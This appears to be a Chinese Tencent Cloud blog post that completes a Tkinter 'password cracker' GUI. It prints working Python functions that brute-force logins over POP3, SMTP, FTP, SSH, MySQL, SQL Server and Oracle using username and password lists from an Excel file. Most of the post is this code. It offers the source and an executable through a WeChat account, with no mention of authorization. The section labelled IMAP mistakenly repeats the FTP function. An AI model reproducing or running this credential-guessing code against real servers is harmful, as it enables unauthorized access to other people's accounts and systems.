专栏首页菜鸟小白的学习分享太实用了!自己动手写软件——我们的密码破解器终于完成了
原创

太实用了!自己动手写软件——我们的密码破解器终于完成了

之前我们完成了密码破解工具的界面,今天我们终于把软件功能给实现了,我们先来看看实现效果吧

实现效果

我们以ftp协议和Oracle协议为例,来看看软件的具体实现效果吧。

FTP协议

页面填写

破解结果

Oracle协议

破解界面配置同ftp界面,点击“提交”后会弹出输入实例名的窗口,输入实例名并回车即可。

因为菜鸟小白没有搭建Oracle服务器所以破解失败的结果如下:

编码

我们再来看看菜鸟小白是如何实现这些功能的。

提交——功能实现

首先我们先完成“提交”功能的实现,“提交”按钮的作用是将用户填写的服务器地址、服务器端口和协议类型信息存储起来,用于后面的密码验证。所以我们先定义了一个字典(因为oracle的数据库连接必须要实例名,所以我们新增了一个db_name)。

1 dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}

获取服务器地址和端口我们定义了一个回调函数gettext,将两个Entry对象传递过来后,直接使用一个get命令就可以将Entry中的内容取出来,同时我们添加了对IP和端口的合法性校验。

 1 def gettext(x,y):
 2     """
 3     获取输入框内容
 4     :param x: 输入框对象——服务器IP
 5     :param y: 输入框对象——服务器端口
 6     :return:
 7     """
 8     server_ip = x.get()
 9     server_port = y.get()
10     #判断输入的IP和端口是否合法
11     if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?",server_ip)):
12         tkinter.messagebox._show(title="IP输入不合法", message='请重新输入合法IP')
13     # elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})$",server_port)):
14     elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)$",server_port)):
15         tkinter.messagebox._show(title="端口输入不合法", message='请重新输入合法端口')
16     else:
17         dic_list["server_port"] = server_port
18         dic_list["server_ip"] = server_ip
19     print(dic_list["server_ip"],dic_list["server_port"])

对于协议类型的读取,我们定义了一个回调函数get_select,同时我们对协议是否选择进行判断,若没有选择则提示重新选择协议。

 1 def get_select(y,list_pro):
 2     """
 3     获取列表的选择
 4     :param y:列表框对象
 5     :param list_pro:列表
 6     """
 7     for i in range(0, len(list_pro)):
 8         if y.selection_includes(i):
 9             #补充dic_list字典中的协议字段内容
10             dic_list["pro"] = list_pro[i]
11         else:
12             pass
13     if dic_list["pro"]=="":
14         tkinter.messagebox._show(title="协议未选择", message='请重新破解协议')
15     elif dic_list["pro"]=='Oracle':
16         dic_list['db_name']=getInput("Oracle实例","请输入Oracle实例信息")
17         print(dic_list['db_name'])

同时我们添加了一个对oracle协议的判断,若选择oracle协议则需要弹出一个窗口填写数据库实例名称。我们新增了一个弹框输入的函数get_Input进行调用。

 1 def getInput(title, message):
 2     def return_callback(event):
 3         print('quit...')
 4         root.quit()
 5 ​
 6     def close_callback():
 7         tkinter.messagebox.showinfo('message', 'no click...')
 8 ​
 9     root = tkinter.Tk(className=title)
10     root.wm_attributes('-topmost', 1)
11     screenwidth, screenheight = root.maxsize()
12     width = 300
13     height = 100
14     size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
15     root.geometry(size)
16     root.resizable(0, 0)
17     lable = tkinter.Label(root, height=2)
18     lable['text'] = message
19     lable.pack()
20     entry = tkinter.Entry(root)
21     entry.bind('<Return>', return_callback)
22     entry.pack()
23     entry.focus_set()
24     root.protocol("WM_DELETE_WINDOW", close_callback)
25     root.mainloop()
26     str = entry.get()
27     root.destroy()
28     return str

这样我们的“提交”按钮功能就全部完成了。接下来我们看看“开始破解”菜单按钮的功能。

开始破解——功能实现

我们定义了一个回调函数为mimapojie

  1. 首先会读取密码字典
  2. 然后是选择协议并执行破解动作
  3. 最后是展示破解结果
1 def mimapojie(server_ip,server_port,pro):
2     get_user_and_passwd('./test.xls', 0)
3     print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name'])
4     #展示破解结果
5     tkinter.messagebox._show(title='破解结果',message=dic_list['pro'],detail=print_list)

接下来我们依次看看这三个方面都是如何实现的。

读取密码字典

我们使用的是我们之前文章中使用的读取Excel表格的方式,我们直接将第一列的内容读取到user_list列表中,将第二列内容读取到password_list列表中。

 1 def get_user_and_passwd(file_path, sheet_id):
 2     """
 3     获取密码库中的用户名密码
 4     :param file_path: 密码库的路径及文件名
 5     :param sheet_id: 密码库中的sheet id
 6     """
 7     read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id)
 8     rows = read_excel.get_lines()
 9     global user_list
10     global password_list
11     for i in range(0, rows):
12         if read_excel.get_value(i, 0):
13             user_list.append(read_excel.get_value(i, 0))
14         if read_excel.get_value(i, 1):
15             password_list.append(read_excel.get_value(i, 1))

选择协议并执行破解动作

我们定义了一个选择协议函数,根据获取到的选择协议字段执行不同的破解函数。

 1 def choice_protocol(server_ip,server_port, pro,db_name):
 2     """
 3     选择需要破解的协议
 4     :param server_ip:需要破解的服务器IP
 5     :param server_port:需要破解的服务器端口
 6     :param pro: 需要破解的协议
 7     :param db_name: oracle数据库的实例名
 8     """
 9     if  pro == "POP3":
10         attempt_pop(server_ip, server_port)
11     elif pro == "IMAP":
12         print('this is a test')
13         attempt_imap(server_ip, server_port)
14     elif pro == "SMTP":
15         attempt_smtp(server_ip, server_port)
16     elif pro == "FTP":
17         attempt_ftp(server_ip, server_port)
18     elif pro == "SSH":
19         attempt_ssh(server_ip, server_port)
20     elif pro == 'MySql':
21         attempt_mysql(server_ip, server_port)
22     elif pro == "SQL Server":
23         attempt_mssql(server_ip, server_port)
24     elif pro == "Oracle":
25         attempt_oracle(server_ip, server_port,db_name)
26 ​
27     return print_list

POP3协议的破解函数

 1 def attempt_pop(server_ip, server_port):
 2     """
 3     破解POP3协议的用户名密码
 4     :param server_ip: 破解的服务器IP
 5     :param server_port: 破解的服务器端口
 6     """
 7     print("=======破解POP3协议========")
 8     print_list.clear()
 9     for i in range(0, len(user_list)):
10         for j in range(0, len(password_list)):
11             try:
12                 pop3_server = poplib.POP3(host=server_ip,port=server_port)
13                 pop3_server.user(user_list[i])
14                 pop3_server.pass_(password_list[j])
15                 #获取邮件列表,用于判断是否登录成功
16                 pop3_server.list()
17                 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
18             except:
19                 pass
20     if not print_list:
21         print_list.append("密码破解失败")

IMAP协议的破解函数

 1 def attempt_ftp(server_ip,port=21):
 2     """
 3     破解FTP协议的用户名密码
 4     :param server_ip: 破解的服务器IP
 5     :param port: 破解的服务器端口,默认为21
 6     """
 7     ftp = FTP()
 8     ftp.connect(server_ip, port)
 9     global print_list
10     print_list.clear()
11     for i in range(0, len(user_list)):
12         for j in range(0, len(password_list)):
13             try:
14                 ftp.login(user_list[i], password_list[j])
15                 ftp.quit()
16                 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
17             except:
18                 pass
19     if not print_list:
20         print_list.append("密码破解失败")

SMTP协议的破解函数

 1 def attempt_smtp(mail_host, port=25):
 2     """
 3     破解SMTP协议的用户名密码
 4     :param mail_host: 破解的服务器IP
 5     :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
 6     :param port: 破解服务器的端口,默认为25
 7     """
 8     print("=======破解SMTP协议========")
 9 ​
10     global user_list
11     global password_list
12     print_list.clear()
13     for i in range(0, len(user_list)):
14         for j in range(0, len(password_list)):
15             try:
16                 smtpObj = smtplib.SMTP(timeout=3)
17                 smtpObj.set_debuglevel(0)
18                 smtpObj.connect(mail_host, port)  # 25 为 SMTP 端口号
19                 smtpObj.login(user_list[i], password_list[j])
20                 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
21             except Exception as e:
22                 print(e)
23                 pass
24     if not print_list:
25         print_list.append("密码破解失败")

FTP协议的破解函数

 1 def attempt_ftp(server_ip,port=21):
 2     """
 3     破解FTP协议的用户名密码
 4     :param server_ip: 破解的服务器IP
 5     :param port: 破解的服务器端口,默认为21
 6     """
 7     ftp = FTP()
 8     ftp.connect(server_ip, port)
 9     global print_list
10     print_list.clear()
11     for i in range(0, len(user_list)):
12         for j in range(0, len(password_list)):
13             try:
14                 ftp.login(user_list[i], password_list[j])
15                 ftp.quit()
16                 print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
17             except:
18                 pass
19     if not print_list:
20         print_list.append("密码破解失败")

SSH协议的破解函数

def attempt_ssh(server_ip, port=22):
    """
    破解SSH协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param port: 破解的服务器端口,默认为22
    """
    print("=======破解SSH协议========")
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j])
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

MySQL协议的破解函数

def attempt_mysql(server_ip, server_port=3306,db_name='mysql'):
    """
    破解MySQL协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
    """
    print("=======破解MYSQL协议========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                # pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name)
                db = pymysql.connect(server_ip, user_list[i], password_list[j])
                db.close()
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

SQL server协议的破解函数

def attempt_mssql(server_ip, server_port):
    """
    破解SQL server协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param server_port: 破解的服务器端口
    """
    print("=======破解SQL Server协议========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                db = pymssql.connect(server_ip,user_list[i],password_list[j])
                db.close()
                # print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密码破解失败")

Oracle协议的破解函数

def attempt_oracle(server_ip,db_name, port=1521 ):
    """
    破解Oracle协议的用户名密码
    :param server_ip: 破解的服务器IP
    :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
    :param port: 破解的服务器端口,默认为1521
    """
    print("=======破解Oracle协议========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name)
                # print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
                print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
            except Exception as e:
                pass
    if not print_list:
        print_list.append("密码破解失败")

程序获取

老规矩,关注公众号“菜鸟小白的学习分享”。

  1. 回复“密码破解源码”即可获得源码下载链接
  2. 回复“密码破解可执行程序”即可获得工具软件

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 媳妇儿喜欢玩某音中的动漫特效,那我就用python做一个图片转化软件。

    最近某音上的动漫特效特别火,很多人都玩着动漫肖像,我媳妇儿也不例外。看着她这么喜欢这个特效,我决定做一个图片处理工具,这样媳妇儿的动漫头像就有着落了。

    菜鸟小白的学习分享
  • 太实用了!自己动手写软件——密码验证器的界面实现

    我们今天的目标很简单,就是先把软件的界面设计和写出来,并不关心每一个按钮和输入框之后的功能实现。我设计一个这样的界面(极其简单,只是实现功能)

    菜鸟小白的学习分享
  • python学习一

    以上大家有可能知道,也有可能不知道,但我相信python自动化和python爬虫我相信大家一定听说过。这也是我为什么要学习python的原因了。

    菜鸟小白的学习分享
  • Python函数参数(补充)

      最近看了几篇文章,介绍函数传参数的,下面一一介绍,希望对你理解Python有帮助。

    py3study
  • Python列表操作方法

    b.insert(1,'one')   #两个参数,第一个为索引,第二个为需要插入的参数值

    py3study
  • python做全文检索引擎

    ** 最近一直在探索着如何用python实现像百度那样的关键词检索功能。说起关键词检索,我们会不由自主地联想到正则表达式。正则表达式是所有检索的基础...

    py3study
  • Python 二十三大实践、编码建议和技巧

    2020年,你又立了什么新的 Flag?新一年,我为大家准备 23 个非常优秀的 Python 实践技巧。希望这些诀窍能在实际工作中帮助大家,并且学到一些有用的...

    测试开发技术
  • Python_实用入门篇_08

    数学上,序列是被排成一列的对象(或事件)这样每个元素不是在其他元素之前,就是在其他元素之后。这里,元素之间的顺序非常重要。序列是Python中最基本的数据结构...

    py3study
  • Python学习-3天--列表与元组

          列表是Python中最基本的数据结构。序列中的每个元素都分配一个数字 - 它的位置,或索引,第一个索引是0,第二个索引是1,依此类推。(python...

    py3study
  • python-购物车

    郭耀华

扫码关注云+社区

领取腾讯云代金券